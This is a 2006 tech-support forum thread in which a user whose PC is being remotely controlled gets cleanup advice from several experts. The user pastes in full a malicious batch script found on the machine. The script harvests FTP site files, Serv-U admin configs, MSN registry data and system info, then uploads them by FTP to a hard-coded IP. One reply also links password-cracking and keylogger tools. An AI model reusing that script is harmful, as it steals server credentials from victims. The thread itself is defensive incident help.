Solved

Emergency!! Somebody is hacking me, i see them moving mouse on desktop

Posted on 2006-06-30
37
1,103 Views
Last Modified: 2013-11-16
So I saw my desktop mouse begin to move and they opened internet explorer and began to type bet and then it was autofilled and they hit return it began to run an application, but i quickly hit cancel and shut down my computer... I then installed syagte firewall, but i dont rerally trust it... I just installed NO virus protection   removed symantec, just becaue i dont trust it now after what happened/// Also, I am running a router, i disabled port forwarding for now and i just dont know what to do... I'm pretty sure they have installed something over time... Virus protection is not picking it up... What else would i want to run??? Could it be a trojan??? I checked my startup by running a file called startup.exe and msconfig.exe and found nothing odd.... i dont know
0
Comment
Question by:PaigePeople
  • 14
  • 13
  • 4
  • +3
37 Comments
 
LVL 3

Assisted Solution

by:tnapolitano
tnapolitano earned 100 total points
ID: 17021576
Sounds like some version of remote desktop (dameware, vnc, radmin, etc.).

1) Disconnect system from network (do you have more than one 1 system, a LAN? If so, you'll need to perform the following steps on all.)

2) Reinstall o/s. Despite the claims of cleaners and anti-virus et al, the only way to be sure is to reinstall. I hope you have backups (if not, you should be able to backup mail, bookmarks and docs with a minimum of risk.

I don't know you're setup, but is your system connected directly to the Internet? Are you behind a firewall/NAT device?
0
 
LVL 38

Expert Comment

by:Rich Rumble
ID: 17021735
Trojan, or rootkit are possible, do you have something like VNC, GoToMyPc or PcAywhere, some sort of remote administration software like those? Otherwise I'd scan the PC either off-line, by removing the HD and placing it in another as a secondary drive, or you can try rootkitrevealer http://www.sysinternals.com/Utilities/RootkitRevealer.html
I prefer McAfee personally and professionally. A firewall like McAfee's or ZoneAlarm's are very good also.
Run the GRC.com sheilds up test's, if you can turn on the previous settings and see if you have a port exposed that might lead to such an occurance. https://www.grc.com/x/ne.dll?bh0bkyd2 Run the full scan (all service ports)
-rich
0
 

Author Comment

by:PaigePeople
ID: 17021955
I have a firewall, sygate personal firewall on all computers... i am running lots of virus protection disabled all networki connections, changed settings on router, changed all passwords... ran some trojan removing software, one found a root kit.... I disabled all remote connections allowed... everything seems ok at the moment, waiting for virus protection to finsih scanning, then i might take some of your steps... just hate to have to wipe out reinstall all os's... have 3 computers in the house.....
0
 

Author Comment

by:PaigePeople
ID: 17021964
i will defintley run that root kit revealer once the scan is done... im going to disabvle my internet again for a few moments... thanks again!!! i am still in shock over what i saw!!! pretty crazy to see someone on your desktop opening IE and moving the mouse around and stuff.... wow
0
 

Author Comment

by:PaigePeople
ID: 17021992
Ok so on my computer runnign windows server 2003, with sygate firewall and symantec corporaste 9.0 virus protection i have a web server running and an ftp for uploading website files.... i can defintley close port 21 if needed, but i think this goes way beyond that... First off the server was not the computer with the mouse being moved around, that was just an everyday client machine... Below are the results from the main client machine... but i am thinking its showing 80 and 21 open because that is what is being port forwadered on the router in ordser to keep my buddys web sitre running, his restaurant... I also always have the server computer locvked and never saw any foul play going on on that computer.... but below are results from GRC scan

GRC Port Authority Report created on UTC: 2006-07-01 at 01:42:21

Results from scan of ports: 0-1055

    2 Ports Open
 1047 Ports Closed
    7 Ports Stealth
---------------------
 1056 Ports Tested

Ports found to be OPEN were: 21, 80

Ports found to be STEALTH were: 20, 135, 136, 137, 138, 139,
                                445

Other than what is listed above, all ports are CLOSED.

TruStealth: FAILED - NOT all tested ports were STEALTH,
                   - NO unsolicited packets were received,
                   - NO Ping reply (ICMP Echo) was received.
0
 
LVL 23

Expert Comment

by:Erik Bjers
ID: 17022104
look at the running processes on the affected system and post them here.

To find the running processes, do one of the following;

A:
Preee Ctrl+Alt+Del
IF you get the windows security screen click task manager
Go to the process tab

B:
Press Crtl+Alt+Del
Click the process tab

eb
0
 
LVL 47

Assisted Solution

by:rpggamergirl
rpggamergirl earned 100 total points
ID: 17022379
If Rootkit Revealer doesn't find anything, also try Gmer, some rootkit targets Rootkit Revealer and Blacklight so they won't show up in the logs but gmer is only new and so not targeted yet.

1. Download GMER from here:
http://www.gmer.net/gmer.zip

Unzip it and start GMER.exe
Click the rootkit-tab and click scan.

Once done, click the Copy button.
This will copy the results to clipboard.
Paste the results in your next reply.

If you're having problems with running GMER.exe, try it in safe mode.


Also try Hiajckthis, trojans and keyloggers sometimes show up there.
2. Please download HijackThis 1.99.1
http://www.cyberanswers.org/forum/uploads/HijackThis1991.exe
Open Hijackthis, click "Do a system scan and save a logfile" don't fix anything yet.

The go to the below link and login using your Experts-Exchange username and password.
http://www.ee-stuff.com

Click on "Expert Area" tab
type or paste the link to your Question
"Browse" to the location of your Hijackthis log and click "Upload"
0
 
LVL 2

Expert Comment

by:r2r
ID: 17023451
I agree what rpggamergirl post, must know something what's running on your OS, check everything, startup, registry, and unfamiliar/unregistered windows running program.

try using hijackthis for you to see the registry and startup programs.
0
 
LVL 3

Expert Comment

by:tnapolitano
ID: 17024418

I understand your reluctance to reinstall the os's, what with 3 systems. Call this a learning experience.

The thing is, you can no longer trust your system. That means the antivirus, the registry, etc.

Here's an article from Microsoft on how to recover from being hacked (http://www.microsoft.com/technet/community/columns/secmgmt/sm0504.mspx), and a quote from that article:

"The only way to clean a compromised system is to flatten and rebuild. That’s right. If you have a system that has been completely compromised, the only thing you can do is to flatten the system (reformat the system disk) and rebuild it from scratch (reinstall Windows and your applications)..."

I agree. Then to make your life easier in the future, get some imaging software (Ghost, Drive-Image) and once you have the systems back a ready state, image them and store the images. This will save restore time if this should happen again.

You have 3 systems, are you the only user? Are any of these systems being used by inexperienced users? If so, maybe you need to do a little "user awareness training".

Here is a link to some "Practice Safe Computing" from M$.

http://www.microsoft.com/smallbusiness/resources/technology/security.mspx

One in particular I thought applied to you is: "How to shield your network from clever hackers" (http://www.microsoft.com/smallbusiness/resources/technology/security/how_to_shield_your_network_from_clever_hackers.mspx).

It speaks to the considerable threats to which a system/network is still vulnerable after all the firewall, anti-virus and updates have been installed.


0
 

Author Comment

by:PaigePeople
ID: 17069272
Ok so i formatted my computer and i think it was hacked again, my ip wont change even called my isp to try and have them change it, but they couldnt... anyways, i found some files in a temp folder and a hidme.exe file which hides applications from running... this was one batch file i saw in the temp folder... its defintley doing something.... anyways, anybody have a clue whats going on????



ping 127.0.0.1
ping 127.0.0.1
echo %temp%>%temp%\tempa.txt
%temp%\gsar -s:x3a -r:x0d:x0a %temp%\tempa.txt -o
set /p schijf=<%temp%\tempa.txt
del temp.txt
%schijf%:
cd %temp%


del site*.txt
del sysinf*.txt

regedit /e temp.dbf "HKEY_CURRENT_USER\Software\Microsoft\MSNMessenger"
type temp.dbf | find "User.NET Messenger Service">sysinf.txt
dbf>>sysinf.txt
sysinfo>>sysinf.txt

type sysinf.txt | find "FIXED">sysinf2.txt
gsar -s:x3a -r:x0d:x0a -o sysinf2.txt
type sysinf2.txt | find "Drive">sysinf3.txt

:choppen
set /p currentdrive=<sysinf3.txt
echo %currentdrive%>current.txt
type current.txt | find "Drive"
if errorlevel 1 goto laatsteschijf
gsar -s"Drive " -r"" -o current.txt
set /p currentdrive=<current.txt
sed 1d sysinf3.txt>sysinf4.txt
copy /Y sysinf4.txt sysinf3.txt
echo ================================================================>>site.txt
echo ================================================================>>sate.txt
dir %currentdrive%:\sites.dat*.* /s >>site.txt
ping 127.0.0.1
ping 127.0.0.1

dir %currentdrive%:\servuadmin.ini*.* /s >>sate.txt
type site.txt | find "\">>site2.txt
type sate.txt | find "\">>sate2.txt
gsar -s"%currentdrive%":x3a  -r"999999999%currentdrive%":x3a -o site2.txt
gsar -s"%currentdrive%":x3a  -r"999999999%currentdrive%":x3a -o sate2.txt
gsar -s"999999999" -r:x0d:x0a -o site2.txt
gsar -s"999999999" -r:x0d:x0a -o sate2.txt
type site2.txt | find "\">>maps.txt
type sate2.txt | find "\">>meps.txt
del site2.txt
del site.txt
del sate.txt
del sate2.txt

ping 127.0.0.1
ping 127.0.0.1

goto choppen

:laatsteschijf
echo laatste schijf
type maps.txt | find "\"
if errorlevel 1 goto klaarmetsites
set /p pad=<maps.txt
echo "DEZE SITES.DAT KOMT UIT DE MAP %pad%">>temp.txt
type "%pad%\sites.dat">>temp.txt
sed 1d maps.txt>maps2.txt
copy /y maps2.txt maps.txt
echo ******************************************************************************************************>>temp.txt
goto laatsteschijf


:klaarmetsites
echo laatste schijf
type meps.txt | find "\"
if errorlevel 1 goto klaarmetdit
set /p pad=<meps.txt
echo "DEZE SERVUADMIN.INI (DUMPBEHEERDER-INIFILE) KOMT UIT DE MAP %pad%">>temp.txt
type "%pad%\servuadmin.ini">>temp.txt
sed 1d meps.txt>meps2.txt
copy /y meps2.txt meps.txt
echo ******************************************************************************************************>>temp.txt
goto laatsteschijf


pause
:klaarmetdit

type sysinf.txt >>temp.txt
type sysinf.txt | find "Mac Address">mac.txt
gsar -s" " -r"" -o mac.txt
gsar -s:x3a -r"" -o mac.txt
gsar -s"MacAddress" -r"" -o mac.txt
set /p mac=<mac.txt
del mac.txt
ren temp.txt %mac%.exe

echo open 62.166.34.66>todo.txt
echo user dmk>>todo.txt
echo dmk>>todo.txt
echo quote pasv>>todo.txt
echo mput %mac%.exe>>todo.txt
echo y>>todo.txt
echo **GEUPLOAD_MET_VERSIE07**>>todo.txt
echo quit>>todo.txt
ftp -s:todo.txt -n

ping 127.0.0.1
del todo.txt

echo open 62.166.34.66>todo.txt
echo user dmk>>todo.txt
echo dmk>>todo.txt
echo mput %mac%.exe>>todo.txt
echo y>>todo.txt
echo **GEUPLOAD_MET_VERSIE08**>>todo.txt
echo quit>>todo.txt
ftp -s:todo.txt -n
attrib -h *.*
del todo.txt


echo klaar
del sysinf*.txt
del %mac%.exe
del current.txt
del maps*.txt
del /F /Q *.*

0
 
LVL 38

Accepted Solution

by:
Rich Rumble earned 150 total points
ID: 17069504
I think it's using MSN to issue "Remote Assistance", even if it's disabled, it might be accessing the registry to change that value...
http://www.microsoft.com/technet/prodtechnol/winxppro/maintain/rmassist.mspx

gsar was a program i was not fimilar with, but it's a serach and replace util... http://gnuwin32.sourceforge.net/packages/gsar.htm
The IP listed seems to belong to this range... you can try to contact their Abuse department.
% Information related to '62.166.0.0 - 62.166.63.255'
inetnum:      62.166.0.0 - 62.166.63.255
netname:      VERSATEL-CUST-VERSNET-ADSL-1
descr:        Zon internet is one of the largest free ISP in the Netherlands
country:      NL
admin-c:      ZA134-RIPE
tech-c:       ZA134-RIPE
tech-c:       VT1029-RIPE
remarks:      ------------------------------------------
remarks:      For abuse issues please contact
remarks:      abuse@zonnet.nl
remarks:      ------------------------------------------
status:       ASSIGNED PA
mnt-by:       AS13127-MNT
source:       RIPE # Filtered
role:         ZONnet Administrator
address:      Hullenbergweg 101
address:      1101 CL  Amsterdam Zuidoost
address:      the Netherlands
phone:        +31 (0)20 7507772
fax-no:       +31 (0)20 7507750
admin-c:      AZ260-RIPE
tech-c:       AZ260-RIPE
tech-c:       VT1029-RIPE
nic-hdl:      ZA134-RIPE
remarks:      -------------------------------------------
remarks:      For abuse issues please contact
remarks:      abuse@zonnet.nl
remarks:      ------------------------------------------
mnt-by:       AS13127-MNT
source:       RIPE # Filtered
role:           VT HOSTMASTER
address:        Hullenbergweg 101
address:        1101 CL  Amsterdam ZuidOost
address:        The Netherlands
remarks:        -------------------------------------------------------------------------------
remarks:        For ZON/Versatel consumer related abuse issues please contact abuse@versatel.nl
remarks:        For all other abuse issues please contact abuse@versatel.net
remarks:        -------------------------------------------------------------------------------
admin-c:        RVDK1-RIPE
tech-c:         RVDK1-RIPE
tech-c:         ROBH1-RIPE
nic-hdl:        VT1029-RIPE
remarks:        This is the Versatel hostmaster role
remarks:        Please direct all queries to this role and *not* to person objects
abuse-mailbox:  abuse@zonnet.nl
abuse-mailbox:  abuse@versatel.nl
abuse-mailbox:  abuse@versatel.net  <---------------------------------------------
mnt-by:         AS13127-MNT
source:         RIPE # Filtered
% Information related to '62.166.0.0/16AS13127'
route:        62.166.0.0/16
descr:        Versatel customers
origin:       AS13127
mnt-by:       AS13127-MNT
source:       RIPE # Filtered

I would download ZoneAlarm, save to CD. Reinstall the OS. Before plugging it into the internet, install zonealarm. Then get all your updates and service packs.
-rich
0
 
LVL 23

Expert Comment

by:Erik Bjers
ID: 17069511
If you are getting a dynamic IP fromy your ISP the only way to change the IP is to leave the computer disconnected from the internet (or off) for 8 days (that is assuming your ISP is using the standard 8 day lease for an IP address.  This way when you reconnect you should get a new IP

I can not tell you exactly what that .bat file does but I can tell you it is NOT GOOD

After you formated and reinstalled the OS did you install anything else?  If so what?

eb
0
 

Author Comment

by:PaigePeople
ID: 17069687
As for leaving my computer unhooked for 8 days, that would be serious withdrawl!!!! not sure i could do that... I tried leaving it unhooked for 12 hours one day to renew the ip because i was told to try that, but it didnt work and that was hard :)  Anyways, The only stuff i installed where the basics, like office 2003, SYGATE personal firewall, symnatec 9.0 corporate edition, and anapod which is software for my ipod, winamp, and DVD decrypter, dvd shrink and thats it.... I did all updates and virus protection was up to date.... Not a big fan of sygate personal firewall, seems to allow a lot of incoming traffic... I say yes to some things such as ECHO REQUEST and some other stuff that i thopught was associated with windows, but maybe im accepting his incoming connection..... wow this stinks that i have to format again.... so how well does zone alarm work??? and is there a better virus protection software i should use other then symantec?? I always thougt symantec was good and basically thats how i fo8und out about this probelm, it detected a threat no as HideRUN   found  in my temp folder

C:\Documents and Settings\kwatkins\Local Settings\Temp\

HideRun.exe
0
 
LVL 23

Expert Comment

by:Erik Bjers
ID: 17069776
When you reformated did you do a quick or full format?  Some viruses may not be wiped out by a quick format as all that does is delete the FAT table (tells the OS where the files are).  You may want to go to the HD manufacturer's website and see if they have a lowlevel format util.  This will completley clear the drive of any residual data, then reinstall the OS.

Are the apps you installing things you downloaded, or purchased, or bootlegd?  If downloaded or bootleged then the install files may be infected.  Use Symantec (with updated defs) to scan install CD's before installing anything.

eb
0
 
LVL 23

Expert Comment

by:Erik Bjers
ID: 17069779
Also what is the name of the .bat file you mentioned above?
0
 
LVL 47

Expert Comment

by:rpggamergirl
ID: 17069807
You might as well format again, :)

You can delete the .exes or bat files in the temp folders but you really need to find the trojan that they used to drop those files in the first place.
0
 

Author Comment

by:PaigePeople
ID: 17069855
Yeah i might format again tonight or tomorrow, as for the programs they are all legit copies... I either got them from work or i bought them, but mopst come from work... I actually do support at work, but I guess i am not as smart as they think I am... Most of the problems I deal with are super easy, so i dont run into too many crazy problems like this.. Anyways, the name of that bat file is called start.bat   and there is also another one called startit.bat  which basically just runs the hiderun.exe file   but this is whats in that bat file  %temp%\hiderun.exe "%temp%\start.bat"    and the other one is posted above, called start.bat.... so startit.bat must be the first to run and then it loads start.bat   oy vay
0
 
LVL 38

Expert Comment

by:Rich Rumble
ID: 17069971
The IP is of no real concern, even if it switched, some ISP's use dynamic DNS, so even if the IP changes, the name might stay the same. Besides, this program is dial-in home via MSN in my opinion, and your ip is of no consequence to it running, as long as you have a connection to the internet.
I find that McAfee is better than symantec over all, better virus detection, configurable overhead, spy-ware and mal-ware detection greater than most AV products. If you just have McAfee AV only, get ZoneAlarm (pro recommended). But the McAfee+Firewall is very very good in my opinion.
McAfee for instance detects (mid-download) these programs that Norton doesn't detect until they are run, or scanned on the HD after being downloaded.
http://ntsecurity.nu/toolbox/kerbcrack/ http://ntsecurity.nu/toolbox/klogger/  http://ntsecurity.nu/toolbox/fakegina/
http://www.oxid.it/cain.html http://www.openwall.com/john/  http://www.openwall.com/passwords/dl/pwdump/pwdump4.zip
Not that those programs have viri in them, however they could be used for "evil".

ZoneAlarm, and mcafee's firewall, not only do ingress filtering, but they also do egress filtering, which is outbound traffic monitoring.
-rich
0
How to run any project with ease

Manage projects of all sizes how you want. Great for personal to-do lists, project milestones, team priorities and launch plans.
- Combine task lists, docs, spreadsheets, and chat in one
- View and edit from mobile/offline
- Cut down on emails

 
LVL 23

Assisted Solution

by:Erik Bjers
Erik Bjers earned 150 total points
ID: 17070018
PaigePeople,

hiderun.exe is part of BAT.boohoo.Worm see http://securityresponse.symantec.com/avcenter/venc/data/bat.boohoo.worm.html for info

If you format again DO A FULL FORMAT, a lowlevel or wipe would be best but can take many HRS.



richrumble,

"I find that McAfee is better than symantec over all" I disagree %100

McAfee even killed office apps for a period of time http://news.com.com/McAfee+update+exterminates+Excel/2100-1002_3-6048709.html
Symantec has never done this.  I have been using both Symantec's home and buisness porducts since they were Norton and I think they are the best.  The only problem I have with Symantec is that if you need to uninstall sometimes somethings get left behind, but they published a tool for this.

Symantec also finds more Viruses and provids defs and repairs, faster than any other company out there.

I just started a topic on Symantec VS McAfee, so feel free to make your argument there

eb
0
 
LVL 23

Expert Comment

by:Erik Bjers
ID: 17070026
P.S. I agree with richrumble, the IP you have is not a concern... The hack is an outbound so your system must make the contact first

eb
0
 
LVL 23

Expert Comment

by:Erik Bjers
ID: 17070048
0
 

Author Comment

by:PaigePeople
ID: 17070420
I am tyrying zone alarm suite as of now, using the 15 day trial, i do like it better then symantechs firewall program i am using, it seems to give you a bit more info about whats going on.. It is currently scanning my computer for viruses, i noticed it has found two as of now, but the thing is, i have some network drives mapped and its scanning those as well, I didn't set up the options before i scanned and remove those drives/folders from being scanned, it's about 2 hours into the scan and just dont want to cancel it now!!! I wonder if i hit the SKIP button (supposed to cancel the scan) if that will allow me to remove those two viruses it found  or if i will have to scan C:\ again completely and then remove the viruses after scan is complete.... Hmmmmm And I did see that boohoo worm page on symantec when i first searched google about the bat file... I guess I will follow the directions and see if it did do most of those things listed on that page.... So you guys are saying that the bat file is trying to dial out?? not using my cable modem to do stuff?? if thats the case i dont even have a nodem installed... well, i dont have a phone line hooked up to it... I wonder what exactly is going on here!!!! Why me, why do people have to hack into other peoples computers...!!!
0
 
LVL 23

Expert Comment

by:Erik Bjers
ID: 17070426
"dial out" in this case does not mean using a modem and phone lines, in this case "dial out" refers to your system making a connection to another system on the internet allowing that system to control yours.

What viruses were found?

0
 

Author Comment

by:PaigePeople
ID: 17070428
oh and just an FYI, i left my syamntec firewall and virus protection installed along with the zone alarm suite and they all seem to be working fine together... I didnt think that would work out, but so far it is!!!
0
 
LVL 23

Expert Comment

by:Erik Bjers
ID: 17070441
usualy does not work out

BTW if your system is alredy infected with a virus when you installed zone alarm, a scan may not be acurate

I would use Symantec's free online virus scan found at: http://security.symantec.com/sscv6/default.asp?productid=symhome&langid=ie&venid=sym

eb
0
 

Author Comment

by:PaigePeople
ID: 17070442
Also, I just looked at both of those virus pages on symantecs website, and nothing was found in my registry or my services that matchd the website removing instructions...
0
 

Author Comment

by:PaigePeople
ID: 17070445
just says infections found - 2     but its still scanning, so i didnt want to stop it... im hoping it finishges pretty soon, or maybe i will try hitting the skip button and see what viruses i have
0
 
LVL 23

Expert Comment

by:Erik Bjers
ID: 17070454
if it's scanning network drives, just disconect the network then it will stop scanning them... or the scan may crash.  (May be worth the risk)

eb
0
 
LVL 23

Expert Comment

by:Erik Bjers
ID: 17070457
Then it may be a different virus...

eb
0
 

Author Comment

by:PaigePeople
ID: 17070459
BAT.IRCFlood     said it removed it....
0
 
LVL 23

Expert Comment

by:Erik Bjers
ID: 17070472
0
 

Author Comment

by:PaigePeople
ID: 17070528
yeah seems to be gone..... so i wonder if i really need to format now..... i might just to be safe... but not until tomorrow.... hmmmm
0
 
LVL 23

Expert Comment

by:Erik Bjers
ID: 17071516
run the online virus scan from symantec, this will run with out interference from any virus that may be on your computer.  If that comes up clean I would say your system is clean.  Delete all the .bat and other files mentioned above (best to do this in safe mode).

Once you have your system stable disable system restore and reboot once (this will clear all the restore points as one of them may be infected) after rebooting it's ok to enable system restore again.

instructions for disabling sys restore are in the symantic links I posted.

eb
0
 
LVL 38

Expert Comment

by:Rich Rumble
ID: 17071964
System restore should be turned off, then a scan made, after a reboot it's ok to turn back on, but I leave it off. McAfee vs Symantec is for a different topic, I'll make my comments there, still it boils down "to each their own", like religion. Root-kit's or "hideme's", like the one this author seems to have, will avoid detection from online scan's as well as installed AV scan's. Try RootKit revealer: http://www.sysinternals.com/Utilities/RootkitRevealer.html If possible, scan you HD in another PC, remove your HD, place in another pc as a Secondary drive, and then have that PC boot up, and scan your HD whiles it's mounted as a secondary drive.
Here is some good scary reading http://www.phrack.org/show.php?p=62&a=12
Read up on best practices and alternate browsers also http://xinn.org/win_bestpractices.html http://www.xinn.org/annoyance_spy-ware.html
-rich
0
 

Author Comment

by:PaigePeople
ID: 17077981
ok guys, i will do follow these last instructions and and then divide the points up how i see fit, defintley giving richrumble and ebjers the most though, they did help the most i believe.. If anybody sees it differently let me know... I will probabaly divide the points tomorrow.... Just want to make sure my system ius running smoothly and what not.... Thanks again!@!!
0
 
LVL 23

Expert Comment

by:Erik Bjers
ID: 17078036
Make sure your system is clean before you close the ? and split the points.

eb
0
 
LVL 47

Expert Comment

by:rpggamergirl
ID: 17095573
Glad to hear everything's okay.

Thanks!
0

Featured Post

Highfive + Dolby Voice = No More Audio Complaints!

Poor audio quality is one of the top reasons people don’t use video conferencing. Get the crispest, clearest audio powered by Dolby Voice in every meeting. Highfive and Dolby Voice deliver the best video conferencing and audio experience for every meeting and every room.

Join & Write a Comment

Phishing is at the top of most security top 10 efforts you should be pursuing in 2016 and beyond. If you don't have phishing incorporated into your Security Awareness Program yet, now is the time. Phishers, and the scams they use, are only going to …
Even if you have implemented a Mobile Device Management solution company wide, it is a good idea to make sure you are taking into account all of the major risks to your electronic protected health information (ePHI).
Sending a Secure fax is easy with eFax Corporate (http://www.enterprise.efax.com). First, Just open a new email message.  In the To field, type your recipient's fax number @efaxsend.com. You can even send a secure international fax — just include t…
This video shows how to remove a single email address from the Outlook 2010 Auto Suggestion memory. NOTE: For Outlook 2016 and 2013 perform the exact same steps. Open a new email: Click the New email button in Outlook. Start typing the address: …

746 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

10 Experts available now in Live!

Get 1:1 Help Now